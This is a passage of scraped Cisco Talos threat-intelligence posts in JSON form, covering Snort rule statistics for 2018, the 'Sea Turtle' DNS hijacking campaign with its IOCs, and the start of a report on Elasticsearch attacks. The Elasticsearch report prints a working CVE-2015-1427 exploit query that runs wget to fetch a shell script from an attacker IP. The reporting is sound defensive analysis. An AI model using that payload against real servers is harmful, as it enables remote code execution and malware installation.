each direction. Inbound alerts are likely to detect traffic that can be attributed to attacks on various server-side applications such as web applications or databases. Outbound alerts are more likely to contain detection of outgoing traffic caused by malware infected endpoints. \n \nLooking at these data sets in more detail gives us the following: \n \n\n\n[![](https://4.bp.blogspot.com/-p8YZlzLMQXE/XFsqAliaQcI/AAAAAAAAACM/XhgffiU6hUYdyd21OCDF_QJAEpBKYYn1gCLcBGAs/s640/012419-Snort-Sigs-Blog-inbound-signature-types.png)](<https://4.bp.blogspot.com/-p8YZlzLMQXE/XFsqAliaQcI/AAAAAAAAACM/XhgffiU6hUYdyd21OCDF_QJAEpBKYYn1gCLcBGAs/s1600/012419-Snort-Sigs-Blog-inbound-signature-types.png>)\n\n \nWhile trojan activity was rule type we saw the most of in 2018, making up 42.5 percent of all alerts, we can now see \"Server-Apache\" taking the lead followed by \"OS-Windows\" as a close second. \n \nThe \"Server-Apache\" class type covers Apache related attacks which in this case consisted mainly of 1:41818 and 1:41819 detecting the Jakarta Multipart parser vulnerability in Apache Struts ([CVE-2017-5638](<https://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>)). Later in 2017, a second Apache Struts vulnerability was discovered under CVE-2017-9805, making this rule type the most observed one for 2018 IDS alerts. \n \n\"OS-Windows\" class alerts were mainly triggered by Snort rule 1:41978, which covers the SMBv1 vulnerability exploited by [Wannacry](<https://blog.talosintelligence.com/2017/05/wannacry.html>) and [NotPetya](<https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html>) (MS-17-010). \n \nThe \"Browser-plugins\" class type covers attempts to exploit vulnerabilities in browsers that deal with plugins to the browser. (Example: ActiveX). Most activity for 2018 seems to consist of Sid 1:8068 which is amongst others linked to the \"Microsoft Outlook Security Feature Bypass Vulnerability\" (CVE-2017-11774). \n\n\n \n\n\n[](<http://2.bp.blogspot.com/-lKN6ktW9YRg/XF2L_nSsNfI/AAAAAAAAAVw/6G830jVQQA8On0TJLRDs0enzFolMyl-0QCK4BGAYYCw/s1600/012419-Snort-Sigs-Blog-outbound-signature-types.png>)[![](https://1.bp.blogspot.com/-hrZUBsvx4sw/XF2Py-Y-_-I/AAAAAAAAAWI/TU0EcE5KCNwNtIznDY93Bt6Hjn0WCih4QCK4BGAYYCw/s1600/012419-Snort-Sigs-Blog-outbound-signature-types.png)](<http://1.bp.blogspot.com/-hrZUBsvx4sw/XF2Py-Y-_-I/AAAAAAAAAWI/TU0EcE5KCNwNtIznDY93Bt6Hjn0WCih4QCK4BGAYYCw/s1600/012419-Snort-Sigs-Blog-outbound-signature-types.png>)\n\n \n \nFor outbound connections, we observed a large shift toward the \"PUA-Other\" class, which is mainly a cryptocurrency miner outbound connection attempt. Cryptomining can take up a large amount of valuable enterprise resources in terms of electricity and CPU power. To see how to block Cryptomining in an enterprise using Cisco Security Products, have a look at our [w](<https://blog.talosintelligence.com/2018/07/blocking-cryptomining.html>)[hitepaper](<https://blog.talosintelligence.com/2018/07/blocking-cryptomining.html>) published in July 2018. \n \nThe most frequently triggered rules within the \"Malware-CNC\" rule class are the Zeus trojan activity rules discussed above. \n\n\n### Conclusion\n\n \n\n\nSnort rules detect potentially malicious network activity. Understanding why particular rules are triggered and how they can protect systems is a key part of network security. Snort rules can detect and block attempts at exploiting vulnerable systems, indicate when a system is under attack, when a system has been compromised, and help keep users safe from interacting with malicious systems. They can also be used to detect reconnaissance and pre-exploitation activity, indicating that an attacker is attempting to identify weaknesses in an organization's security posture. These can be used to indicate when an organization should be in a heightened state of awareness about the activity occurring within their environment and more suspicious of security alerts being generated. \n \nAs the threat environment changes, it is necessary to ensure that the correct rules are in place protecting systems. Usually, this means ensuring that the most recent rule set has been promptly downloaded and installed. As shown in the Apache Struts vulnerability data, the time between a vulnerability being discovered and exploited may be short. \n \nOur most commonly triggered rule in 2018: 1:46237:1 \"PUA-OTHER Cryptocurrency Miner outbound connection attempt\" highlights the necessity of protecting IoT devices from attack. Malware such as Mirai seeks to compromise these systems to use them as part of a botnet to put to use for further malicious behaviour. Network architectures need to take these attacks into consideration and ensure that all networked devices no matter how small are protected. \n \nSecurity teams need to understand their network architectures and understand the significance of rules triggering in their environment. For full understanding of the meaning of triggered detections it is important for the rules to be open source. Knowing what network content caused a rule to trigger tells you about your network and allows you to keep abreast of the threat environment as well as the available protection. \n \nAt Talos, we are proud to maintain a set of open source Snort rules and support the thriving community of researchers contributing to Snort and helping to keep networks secure against attack. We're also proud to contribute to the training and education of network engineers through the Cisco Networking Academy, as well through the release of additional open-source tools and the detailing of attacks on our blog. \n \nYou can [subscribe](<https://www.snort.org/products>) to Talos' newest rule detection functionality for as low as $29 a year with a personal account. Be sure and see our business pricing for Snort as well [here](<https://snort.org/products%23rule_subscriptions>).![](http://feeds.feedburner.com/~r/feedburner/Talos/~4/6rupY-noy3s)", "cvss3": {}, "published": "2019-02-06T08:19:00", "type": "talosblog", "title": "2018 in Snort Rules", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11774", "CVE-2017-5638", "CVE-2017-9805"], "modified": "2019-02-12T14:15:53", "id": "TALOSBLOG:DAD87115458AF1FB5EDF5A2BB21D8AB9", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/6rupY-noy3s/2018-in-snort-signatures.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-04-24T16:19:06", "description": "[![](https://3.bp.blogspot.com/-ksOHISXuYNU/XLX7wzGSHNI/AAAAAAAAAgI/Ffst6mMQLNIBQP1F1gRMNCYEu2-jdZr6ACEwYBhgL/s640/image2.jpg)](<https://3.bp.blogspot.com/-ksOHISXuYNU/XLX7wzGSHNI/AAAAAAAAAgI/Ffst6mMQLNIBQP1F1gRMNCYEu2-jdZr6ACEwYBhgL/s1600/image2.jpg>)\n\n \n \n_Authors: [Danny Adamitis](<https://twitter.com/dadamitis>), [David Maynor](<https://twitter.com/Dave_Maynor>), [Warren Mercer](<https://twitter.com/SecurityBeard>), [Matthew Olney ](<https://twitter.com/kpyke>)and [Paul Rascagneres](<https://twitter.com/r00tbsd>)._ \n_ \n_ \n_Update 4/18: _A correction has been made to our research based on feedback from Packet Clearing House, we thank them for their assistance \n \n\n\n## Preface\n\nThis blog post discusses the technical details of a state-sponsored attack manipulating DNS systems. While this incident is limited to targeting primarily national security organizations in the Middle East and North Africa, and we do not want to overstate the consequences of this specific campaign, we are concerned that the success of this operation will lead to actors more broadly attacking the global DNS system. DNS is a foundational technology supporting the Internet. Manipulating that system has the potential to undermine the trust users have on the internet. That trust and the stability of the DNS system as a whole drives the global economy. Responsible nations should avoid targeting this system, work together to establish an accepted global norm that this system and the organizations that control it are off-limits, and cooperate in pursuing those actors who act irresponsibly by targeting this system. \n \n \n\n\n## Executive Summary\n\nCisco Talos has discovered a new cyber threat campaign that we are calling \"Sea Turtle,\" which is targeting public and private entities, including national security organizations, located primarily in the Middle East and North Africa. The ongoing operation likely began as early as January 2017 and has continued through the first quarter of 2019. Our investigation revealed that at least 40 different organizations across 13 different countries were compromised during this campaign. We assess with high confidence that this activity is being carried out by an advanced, state-sponsored actor that seeks to obtain persistent access to sensitive networks and systems. \n \nThe actors behind this campaign have focused on using DNS hijacking as a mechanism for achieving their ultimate objectives. DNS hijacking occurs when the actor can illicitly modify DNS name records to point users to actor-controlled servers. The Department of Homeland Security (DHS) issued an [alert](<https://www.us-cert.gov/ncas/alerts/AA19-024A>) about this activity on Jan. 24 2019, warning that an attacker could redirect user traffic and obtain valid encryption certificates for an organization's domain names. \n \nIn the Sea Turtle campaign, Talos was able to identify two distinct groups of victims. The first group, we identify as primary victims, includes national security organizations, ministries of foreign affairs, and prominent energy organizations. The threat actor targeted third-party entities that provide services to these primary entities to obtain access. Targets that fall into the secondary victim category include numerous DNS registrars, telecommunication companies, and internet service providers. One of the most notable aspects of this campaign was how they were able to perform DNS hijacking of their primary victims by first targeting these third-party entities. \n \nWe assess with high confidence that these operations are distinctly different and independent from the operations performed by DNSpionage, which we [reported](<https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html>) on in November 2018. The Sea Turtle campaign almost certainly poses a more severe threat than DNSpionage given the actor's methodology in targeting various DNS registrars and registries. The level of access we presume necessary to engage in DNS hijacking successfully indicates an ongoing, high degree of threat to organizations in the targeted regions. Due to the effectiveness of this approach, we encourage all organizations, globally, to ensure they have taken steps to minimize the possibility of malicious actors duplicating this attack methodology. \n \nThe threat actors behind the Sea Turtle campaign show clear signs of being highly capable and brazen in their endeavors. The actors are responsible for the first [publicly confirmed](<https://www.netnod.se/news/statement-on-man-in-the-middle-attack-against-netnod>) case against an organizations that manages a root server zone, highlighting the attacker's sophistication. Notably, the threat actors have continued their attacks despite public reports documenting various aspects of their activity, suggesting they are unusually brazen and may be difficult to deter going forward. In most cases, threat actors typically stop or slow down their activities once their campaigns are publicly revealed. \n \nThis post provides the technical findings you would typically see in a Talos blog. We will also offer some commentary on the threat actor's tradecraft, including possible explanations about the actor's attack methodology and thought process. Finally, we will share the IOCs that we have observed thus far, although we are confident there are more that we have not seen. \n \n\n\n### Background on Domain Name Services and records management\n\nThe threat actors behind the Sea Turtle campaign were successful in compromising entities by manipulating and falsifying DNS records at various levels in the domain name space. This section provides a brief overview of where DNS records are managed and how they are accessed to help readers better understand how these events unfolded. \n \nThe first and most direct way to access an organization's DNS records is through the registrar with the registrant's credentials. These credentials are used to login to the DNS provider from the client-side, which is a registrar. If an attacker was able to compromise an organization's network administrator credentials, the attacker would be able to change that particular organization's DNS records at will. \n \nThe second way to access DNS records is through a DNS registrar, sometimes called registrar operators. A registrar sells domain names to the public and manages DNS records on behalf of the registrant through the domain registry. Records in the domain registry are accessed through the registry application using the Extensible Provisioning Protocol (EPP). EPP was detailed in the [request for comment (RFC) 5730](<https://tools.ietf.org/html/rfc5730>) as \"a means of interaction between a registrar's applications and registry applications.\" If the attackers were able to obtain one of these EPP keys, they would be able to modify any DNS records that were managed by that particular registrar. \n \nThe third approach to gain access to DNS records is through one of the registries. These registries manage any known TLD, such as entire country code top-level domains (ccTLDs) and generic top-level domains (gTLDs). For example, Verisign manages all entities associated with the top-level domain (TLD) \".com.\" All the different registry information then converges into one of [12 different](<https://www.iana.org/domains/root/servers>) organization that manage different parts of the domain registry root. The domain registry root is stored on 13 \"named authorities in the delegation data for the root zone,\" according to [ICANN](<https://www.icann.org/news/blog/there-are-not-13-root-servers>). \n \nFinally, actors could target root zone servers to modify the records directly. It is important to note that there is no evidence during this campaign (or any other we are aware of) that the root zone servers were attacked or compromised. We highlight this as a potential avenue that attackers would consider. The root DNS servers issued a [joint statement](<https://root-servers.org/news/20190314-Rootops_statement_Integrity_of_root_server_system.pdf>) that stated, \"There are no signs of lost integrity or compromise of the content of the root [server] zone\u2026There are no signs of clients having received unexpected responses from root servers.\" \n\n\n### Assessed Sea Turtle DNS hijacking methodology\n\nIt is important to remember that the DNS hijacking is merely a means for the attackers to achieve their primary objective. Based on observed behaviors, we believe the actor ultimately intended to steal credentials to gain access to networks and systems of interest. To achieve their goals, the actors behind Sea Turtle: \n\n\n 1. Established a means to control the DNS records of the target.\n 2. Modified DNS records to point legitimate users of the target to actor-controlled servers.\n 3. Captured legitimate user credentials when users interacted with these actor-controlled servers.\nThe diagram below illustrates how we believe the actors behind the Sea Turtle campaign used DNS hijacking to achieve their end goals. \n \n\n\n### Redirection Attack Methodology Diagram\n\n[![](https://2.bp.blogspot.com/-FQg4Ak28yDc/XLdL-8NlekI/AAAAAAAAAXw/wDpJRiXAEGEzPJo9bQ9PxqOG8rcGn6gWACK4BGAYYCw/s1600/DNSpionage-methodology-v2.png)](<http://2.bp.blogspot.com/-FQg4Ak28yDc/XLdL-8NlekI/AAAAAAAAAXw/wDpJRiXAEGEzPJo9bQ9PxqOG8rcGn6gWACK4BGAYYCw/s1600/DNSpionage-methodology-v2.png>)\n\n \n\n\n### Operational tradecraft\n\n#### Initial access\n\nThe threat actors behind the Sea Turtle campaign gained initial access either by exploiting known vulnerabilities or by sending spear-phishing emails. Talos believes that the threat actors have exploited multiple known CVEs to either gain initial access or to move laterally within an affected organization. Based on our research, we know the actor utilizes the following known exploits: \n\n\n * [CVE-2009-1151](<https://nvd.nist.gov/vuln/detail/CVE-2009-1151>): PHP code injection vulnerability affecting phpMyAdmin\n * [CVE-2014-6271](<https://nvd.nist.gov/vuln/detail/CVE-2014-6271>): RCE affecting GNU bash system, specifically the SMTP (this was part of the [Shellshock](<https://www.us-cert.gov/ncas/alerts/TA14-268A>) CVEs)\n * [CVE-2017-3881](<https://nvd.nist.gov/vuln/detail/CVE-2017-3881>): RCE by unauthenticated user with elevated privileges Cisco switches\n * [CVE-2017-6736](<https://nvd.nist.gov/vuln/detail/CVE-2017-6736>): Remote Code Exploit (RCE) for Cisco integrated Service Router 2811\n * [CVE-2017-12617](<https://nvd.nist.gov/vuln/detail/CVE-2017-12617>): RCE affecting Apache web servers running Tomcat\n * [CVE-2018-0296](<https://nvd.nist.gov/vuln/detail/CVE-2018-0296>): Directory traversal allowing unauthorized access to Cisco Adaptive Security Appliances (ASAs) and firewalls\n * [CVE-2018-7600](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>): RCE for Website built with Drupal, aka \"Drupalgeddon\"\nAs of early 2019, the only evidence of the spear-phishing threat vector came from a compromised organization's public disclosure. On January 4, Packet Clearing House, which is not an Internet exchange point but rather is an NGO which provides support to Internet exchange points and the core of the domain name system, provided confirmation of this aspect of the actors\u2019 tactics when it publicly revealed its internal DNS had been briefly hijacked as a consequence of the compromise at its domain registrar. \n \nAs with any initial access involving a sophisticated actor, we believe this list of CVEs to be incomplete. The actor in question can leverage known vulnerabilities as they encounter a new threat surface. This list only represents the observed behavior of the actor, not their complete capabilities. \n\n\n### Globalized DNS hijacking activity as an infection vector\n\nDuring a typical incident, the actor would modify the NS records for the targeted organization, pointing users to a malicious DNS server that provided actor-controlled responses to all DNS queries. The amount of time that the targeted DNS record was hijacked can range from a couple of minutes to a couple of days. This type of activity could give an attacker the ability to redirect any victim who queried for that particular domain around the world. [Other cybersecurity firms](<https://www.crowdstrike.com/blog/widespread-dns-hijacking-activity-targets-multiple-sectors/>) previously reported some aspects of this activity. Once the actor-controlled name server was queried for the targeted domain, it would respond with a falsified \"A\" record that would provide the IP address of the actor-controlled MitM node instead of the IP address of the legitimate service. In some instances, the threat actors modified the time-to-live (TTL) value to one second. This was likely done to minimize the risk of any records remaining in the DNS cache of the victim machine. \n \nDuring 2019, we observe the following name servers being used in support of the Sea Turtle campaign: \n \n\n\n \n\n\n \n\n\nDomain\n\n| \n\nActive Timeframe \n \n---|--- \n \nns1[.]intersecdns[.]com\n\n| \n\nMarch - April 2019 \n \nns2[.]intersecdns[.]com\n\n| \n\nMarch - April 2019 \n \nns1[.]lcjcomputing[.]com\n\n| \n\nJanuary 2019 \n \nns2[.]lcjcomputing[.]com\n\n| \n\nJanuary 2019 \n \n \n\n\n \n\n\n### Credential harvesting: Man-in-the-middle servers\n\nOnce the threat actors accessed a domain's DNS records, the next step was to set up a man-in-the-middle (MitM) framework on an actor-controlled server. \n \nThe next step for the actor was to build MitM servers that impersonated legitimate services to capture user credentials. Once these credentials were captured, the user would then be passed to the legitimate service. to evade detection, the actors performed \"certificate impersonation,\" a technique in which the attacker obtained a certificate authority-signed X.509 certificate from another provider for the same domain imitating the one already used by the targeted organization. For example, if a DigiCert certificate protected a website, the threat actors would obtain a certificate for the same domain but from another provider, such as Let's Encrypt or Comodo. This tactic would make detecting the MitM attack more difficult, as a user's web browser would still display the expected \"SSL padlock\" in the URL bar. \n \nWhen the victim entered their password into the attacker's spoofed webpage, the actor would capture these credentials for future use. The only indication a victim received was a brief lag between when the user entered their information and when they obtained access to the service. This would also leave almost no evidence for network defenders to discover, as legitimate network credentials were used to access the accounts. \n \nIn addition to the MitM server IP addresses published in previous reports, Talos identified 16 additional servers leveraged by the actor during the observed attacks. The complete list of known malicious IP addresses are in the Indicators of Compromise (IOC) section below. \n\n\n### Credential harvesting with compromised SSL certificates\n\nOnce the threat actors appeared to have access to the network, they stole the organization's SSL certificate. The attackers would then use the certificate on actor-controlled servers to perform additional MitM operations to harvest additional credentials. This allowed the actors to expand their access into the targeted organization's network. The stolen certificates were typically only used for less than one day, likely as an operational security measure. Using stolen certificates for an extended period would increase the likelihood of detection. In some cases, the victims were redirected to these actor-controlled servers displaying the stolen certificate. \n \nOne notable aspect of the campaign was the actors' ability to impersonate VPN applications, such as Cisco Adaptive Security Appliance (ASA) products, to perform MitM attacks. At this time, we do not believe that the attackers found a new ASA exploit. Rather, they likely abused the trust relationship associated with the ASA's SSL certificate to harvest VPN credentials to gain remote access to the victim's network. This MitM capability would allow the threat actors to harvest additional VPN credentials. \n \nAs an example, DNS records indicate that a targeted domain resolved to an actor-controlled MitM server. The following day, Talos identified an SSL certificate with the subject common name of \"ASA Temporary Self Signed Certificate\" associated with the aforementioned IP address. This certificate was observed on both the actor-controlled IP address and on an IP address correlated with the victim organization. \n \nIn another case, the attackers were able to compromise NetNod, a non-profit, independent internet infrastructure organization based in Sweden. NetNod acknowledged the compromise in a [public statement](<https://www.netnod.se/news/statement-on-man-in-the-middle-attack-against-netnod>) on February 5, 2019. Using this access, the threat actors were able to manipulate the DNS records for sa1[.]dnsnode[.]net. This redirection allowed the attackers to harvest credentials of administrators who manage domains with the TLD of Saudi Arabia (.sa). It is likely that there are additional Saudi Arabia-based victims from this attack. \n \nIn one of the more recent campaigns on March 27, 2019, the threat actors targeted the Sweden-based consulting firm Cafax. On Cafax's [public webpage](<http://www.cafax.se/Home.html>), the company states that one of their consultants actively manages the i[.]root-server[.]net zone. NetNod managed this particular DNS server zone. We assess with high confidence that this organization was targeted in an attempt to re-establish access to the NetNod network, which was previously compromised by this threat actor. \n\n\n### Primary and secondary victims\n\n[![](https://4.bp.blogspot.com/-NQC457__bD8/XLX7w7QGGOI/AAAAAAAAAgA/3nx4TTK6U1oHms5gRhGQRaw6TGmTo1H-ACEwYBhgL/s640/image1.jpg)](<https://4.bp.blogspot.com/-NQC457__bD8/XLX7w7QGGOI/AAAAAAAAAgA/3nx4TTK6U1oHms5gRhGQRaw6TGmTo1H-ACEwYBhgL/s1600/image1.jpg>)\n\n \n \nWe identified 40 different organizations that have been targeted during this campaign. The victim organizations appear to be broadly grouped into two different categories. The first group of victims, which we refer to as primary victims, were almost entirely located in the Middle East and North Africa. Some examples of organizations that were compromised include: \n\n\n * Ministries of foreign affairs\n * Military organizations\n * Intelligence agencies\n * Prominent energy organizations\nThe second cluster of victim organizations were likely compromised to help enable access to these primary targets. These organizations were located around the world; however, they were mostly concentrated in the Middle East and North Africa. Some examples of organizations that were compromised include: \n\n\n * Telecommunications organizations\n * Internet service providers\n * Information technology firms\n * Registrars\n * One registry\n \nNotably, the threat actors were able to gain access to registrars that manage ccTLDs for Amnic, which is listed as the technical contact on [IANA](<https://www.iana.org/domains/root/db/am.html>) for the ccTLD .am. Obtaining access to this ccTLD registrars would have allowed attackers to hijack any domain that used those ccTLDs. \n\n\n### How is this tradecraft different?\n\nThe threat actors behind the Sea Turtle campaign have proven to be highly capable, as they have been able to perform operations for over two years and have been undeterred by public reports documenting various aspects of their activity. This cyber threat campaign represents the first known case of a domain name registry organization that was compromised for cyber espionage operations. \n \nIn order to distinguish this activity from the previous reporting on other attackers, such as those affiliated with DNSpionage, below is a list of traits that are unique to the threat actors behind the Sea Turtle campaign: \n\n\n * These actors perform DNS hijacking through the use of actor-controlled name servers.\n * These actors have been more aggressive in their pursuit targeting DNS registries and a number of registrars, including those that manage ccTLDs.\n * These actors use Let's Encrypts, Comodo, Sectigo, and self-signed certificates in their MitM servers to gain the initial round of credentials.\n * Once they have access to the network, they steal the organization's legitimate SSL certificate and use it on actor-controlled servers.\n\n### Why was it so successful?\n\nWe believe that the Sea Turtle campaign continues to be highly successful for several reasons. First, the actors employ a unique approach to gain access to the targeted networks. Most traditional security products such as IDS and IPS systems are not designed to monitor and log DNS requests. The threat actors were able to achieve this level of success because the DNS domain space system added security into the equation as an afterthought. Had more ccTLDs implemented security features such as registrar locks, attackers would be unable to redirect the targeted domains. \n \nThe threat actors also used an interesting techniques called certificate impersonation. This technique was successful in part because the SSL certificates were created to provide confidentiality, not integrity. The attackers stole organizations' SSL certificates associated with security appliances such as ASA to obtain VPN credentials, allowing the actors to gain access to the targeted network. \n \nThe threat actors were able to maintain long term persistent access to many of these networks by utilizing compromised credentials. \n \nWe will continue to monitor Sea Turtle and work with our partners to understand the threat as it continues to evolve to ensure that our customers remain protected and the public is informed. \n \n\n\n### Mitigation strategy\n\nIn order to best protect against this type of attack, we compiled a list of potential actions. Talos suggests using a registry lock service, which will require an out-of-band message before any changes can occur to an organization's DNS record. If your registrar does not offer a registry lock service, we recommend implementing multi-factor authentication, such as [DUO](<https://www.cisco.com/c/en/us/products/security/adaptive-multi-factor-authentication.html>), to access your organization's DNS records. If you suspect you were targeted by this type of activity intrusion, we recommend instituting a network-wide password reset, preferably from a computer on a trusted network. Lastly, we recommend applying patches, especially on internet-facing machines. Network administrators can monitor passive DNS record on their domains, to check for abnormalities. \n \n\n\n### Coverage\n\nCVE-2009-1151: PHP code injection vulnerability affecting phpMyAdmin \nSID: [2281](<https://snort.org/rule_docs/1-2281>) \n \nCVE-2014-6271: RCE affecting GNU bash system, specific the SMTP (this was part of the Shellshock CVEs) \nSID: [31975](<https://snort.org/rule_docs/1-31975>) \\- [31978](<https://snort.org/rule_docs/1-31978>), [31985](<https://snort.org/rule_docs/1-31985>), [32038](<https://snort.org/rule_docs/1-32038>), [32039](<https://snort.org/rule_docs/1-32039>), [32041](<https://snort.org/rule_docs/1-32041>) \\- [32043](<https://snort.org/rule_docs/1-32043>), [32069](<https://snort.org/rule_docs/1-32069>), [32335](<https://snort.org/rule_docs/1-32335>), [32336](<https://snort.org/rule_docs/1-32336>) \n \nCVE-2017-3881: RCE for Cisco switches \nSID: [41909](<https://snort.org/rule_docs/1-41909>) \\- [41910](<https://snort.org/rule_docs/1-41910>) \n \nCVE-2017-6736: Remote Code Exploit (RCE) for Cisco integrated Service Router 2811 \nSID: [43424](<https://snort.org/rule_docs/3-43424>) \\- [43432](<https://snort.org/rule_docs/3-43432>) \n \nCVE-2017-12617: RCE affecting Apache web servers running Tomcat \nSID: [44531](<https://snort.org/rule_docs/1-44531>) \n \nCVE-2018-0296: Directory traversal to gain unauthorized access to Cisco Adaptive Security Appliances (ASAs) and Firewalls \nSID: 46897 \n \nCVE-2018-7600: RCE for Website built with Drupal aka \"Drupalgeddon\" \nSID: [46316](<https://snort.org/rule_docs/1-46316>) \n\n\n### Indicators of Compromise\n\nThe threat actors utilized leased IP addresses from organizations that offer virtual private server (VPS) services. These VPS providers have since resold many of these IP addresses to various benign customers. To help network defenders, we have included the IP address, as well as the month(s) that the IP address was associated with the threat actor. \n \n** \n** \n\n\n**IP address**\n\n| \n\n**Month**\n\n| \n\n**Year**\n\n| \n\n**Country of targets** \n \n---|---|---|--- \n \n199.247.3.191\n\n| \n\nNovember\n\n| \n\n2018\n\n| \n\nAlbania, Iraq \n \n37.139.11.155\n\n| \n\nNovember\n\n| \n\n2018\n\n| \n\nAlbania, UAE \n \n185.15.247.140\n\n| \n\nJanuary\n\n| \n\n2018\n\n| \n\nAlbania \n \n206.221.184.133\n\n| \n\nNovember\n\n| \n\n2018\n\n| \n\nEgypt \n \n188.166.119.57\n\n| \n\nNovember\n\n| \n\n2018\n\n| \n\nEgypt \n \n185.42.137.89\n\n| \n\nNovember\n\n| \n\n2018\n\n| \n\nAlbania \n \n82.196.8.43\n\n| \n\nOctober\n\n| \n\n2018\n\n| \n\nIraq \n \n159.89.101.204\n\n| \n\nDecember - January\n\n| \n\n2018-2019\n\n| \n\nTurkey, Sweden, Syria, Armenia, US \n \n146.185.145.202\n\n| \n\nMarch\n\n| \n\n2018\n\n| \n\nArmenia \n \n178.62.218.244\n\n| \n\nDecember - January\n\n| \n\n2018-2019\n\n| \n\nUAE, Cyprus \n \n139.162.144.139\n\n| \n\nDecember \n\n| \n\n2018\n\n| \n\nJordan \n \n142.54.179.69\n\n| \n\nJanuary - February \n\n| \n\n2017\n\n| \n\nJordan \n \n193.37.213.61\n\n| \n\nDecember\n\n| \n\n2018\n\n| \n\nCyprus \n \n108.61.123.149\n\n| \n\nFebruary\n\n| \n\n2019\n\n| \n\nCyprus \n \n212.32.235.160\n\n| \n\nSeptember\n\n| \n\n2018\n\n| \n\nIraq \n \n198.211.120.186\n\n| \n\nSeptember\n\n| \n\n2018\n\n| \n\nIraq \n \n146.185.143.158\n\n| \n\nSeptember\n\n| \n\n2018\n\n| \n\nIraq \n \n146.185.133.141\n\n| \n\nOctober\n\n| \n\n2018\n\n| \n\nLibya \n \n185.203.116.116\n\n| \n\nMay\n\n| \n\n2018\n\n| \n\nUAE \n \n95.179.150.92\n\n| \n\nNovember\n\n| \n\n2018\n\n| \n\nUAE \n \n174.138.0.113\n\n| \n\nSeptember\n\n| \n\n2018\n\n| \n\nUAE \n \n128.199.50.175\n\n| \n\nSeptember\n\n| \n\n2018\n\n| \n\nUAE \n \n139.59.134.216\n\n| \n\nJuly - December\n\n| \n\n2018\n\n| \n\nUnited States, Lebanon \n \n45.77.137.65\n\n| \n\nMarch - April\n\n| \n\n2019\n\n| \n\nSyria, Sweden \n \n142.54.164.189\n\n| \n\nMarch - April\n\n| \n\n2019\n\n| \n\nSyria \n \n199.247.17.221\n\n| \n\nMarch \n\n| \n\n2019\n\n| \n\nSweden \n \n** \n** \n\n\nThe following list contains the threat actor name server domains and their IP address.\n\n \n\n\nDomain\n\n| \n\nActive Timeframe\n\n| \n\nIP address \n \n---|---|--- \n \nns1[.]intersecdns[.]com\n\n| \n\nMarch - April 2019\n\n| \n\n95.179.150.101 \n \nns2[.]intersecdns[.]com\n\n| \n\nMarch - April 2019\n\n| \n\n95.179.150.101 \n \nns1[.]lcjcomputing[.]com\n\n| \n\nJanuary 2019 \n\n| \n\n95.179.150.101 \n \nns2[.]lcjcomputing[.]com\n\n| \n\nJanuary 2019 \n\n| \n\n95.179.150.101 \n \n![](http://feeds.feedburner.com/~r/feedburner/Talos/~4/GSxJP9GzlhI)", "cvss3": {}, "published": "2019-04-18T16:08:25", "type": "talosblog", "title": "DNS Hijacking Abuses Trust In Core Internet Service", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2009-1151", "CVE-2014-6271", "CVE-2017-12617", "CVE-2017-3881", "CVE-2017-6736", "CVE-2018-0296", "CVE-2018-7600"], "modified": "2019-04-18T16:08:25", "id": "TALOSBLOG:A09C50A444F2D7D6A5D4552C85316387", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/GSxJP9GzlhI/seaturtle.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-03-01T16:16:02", "description": "_![](https://lh3.googleusercontent.com/Ax_LeB8cRI3NcQlEpVxlBmhUF0ABsyIht1YvaSzBgJ5bK-ejCjJhbJSyxB_BOBOfs1ZuNnDNoQQ6EF0a_uwDc2LYyvaVx2SogoeuyhnSALRtzvzJJ7AIkxbPnhcGjG3fC2Su8bUP)_ \n \n_[Christopher Evans](<https://twitter.com/ccevans002>) of Cisco Talos conducted the research for this post._ \n \n\n\n## Executive Summary\n\n \nCisco Talos warns users that they need to keep a close eye on unsecured Elasticsearch clusters. We have recently observed a spike in attacks from multiple threat actors targeting these clusters. These attackers are targeting clusters using versions 1.4.2 and lower, and are leveraging old vulnerabilities to pass scripts to search queries and drop the attacker's payloads. These scripts are being leveraged to drop both malware and cryptocurrency miners on victim machines. Talos has also been able to identify social media accounts associated with one of these threat actors. Because Elasticsearch is typically used to manage very large datasets, the repercussions of a successful attack on a cluster could be devastating due to the amount of data present. This post details the attack methods used by each threat actor, as well as the associated payloads. \n \n\n\n## Introduction\n\n \nThrough ongoing analysis of honeypot traffic, Talos detected an increase in attacks targeting unsecured Elasticsearch clusters. These attacks leverage CVE-2014-3120 and CVE-2015-1427, both of which are only present in old versions of Elasticsearch and exploit the ability to pass scripts to search queries. Based on patterns in the payloads and exploit chains, Talos assesses with moderate confidence that six distinct actors are exploiting our honeypots. \n \nFor example CVE-2015-1427: \n\n\n> { \n \"size\": 1, \n \"script_fields\": { \n \"lupin\": { \n \"script\": \"java.lang.Math.class.forName(\\\"java.lang.Runtime\\\").getRuntime().exec(\\\"wget http://45.76.122.92:8506/IOFoqIgyC0zmf2UR/uuu.sh -P /tmp/sssooo\\\").getText()\" \n } \n } \n}\n\n \nThe most active of these actors consistently deploys two distinct payloads with the initial exploit, always using CVE-2015-1427. The first payload invokes wget to download a bash script, while the second payload uses obfuscated Java to invoke bash and download the same bash script with wget. This is likely an attempt to make the exploit work on a broader variety of platforms. The bash script utilized by the attacker follows a commonly observed pattern of disabling security protections and killing a variety of other malicious processes (primarily other mining malware), before placing its RSA key in the authorized_keys file. Additionally, this bash script serves to download illicit miners and their configuration files. The script achieves persistence by installing shell scripts as cron jobs. \n \nThis bash script also downloads a UPX-packed ELF executable. Analysis of the unpacked sample reveals that this executable contains exploits for a variety of other systems. These additional exploits include several vulnerabilities, all of which could lead to remote code execution, such as CVE-2018-7600 in Drupal, CVE-2017-10271 in Oracle WebLogic, and CVE-2018-1273 in Spring Data Commons. The exploits are sent, typically via HTTPS, to the targeted systems. As evidenced by each of these exploits, the attacker's goal appears to be obtaining remote code execution on targeted machines. Detailed analysis of the payload sample is ongoing, and Talos will provide pertinent updates as necessary. \n \nTalos observed a second actor exploiting CVE-2014-3120, using it to deliver 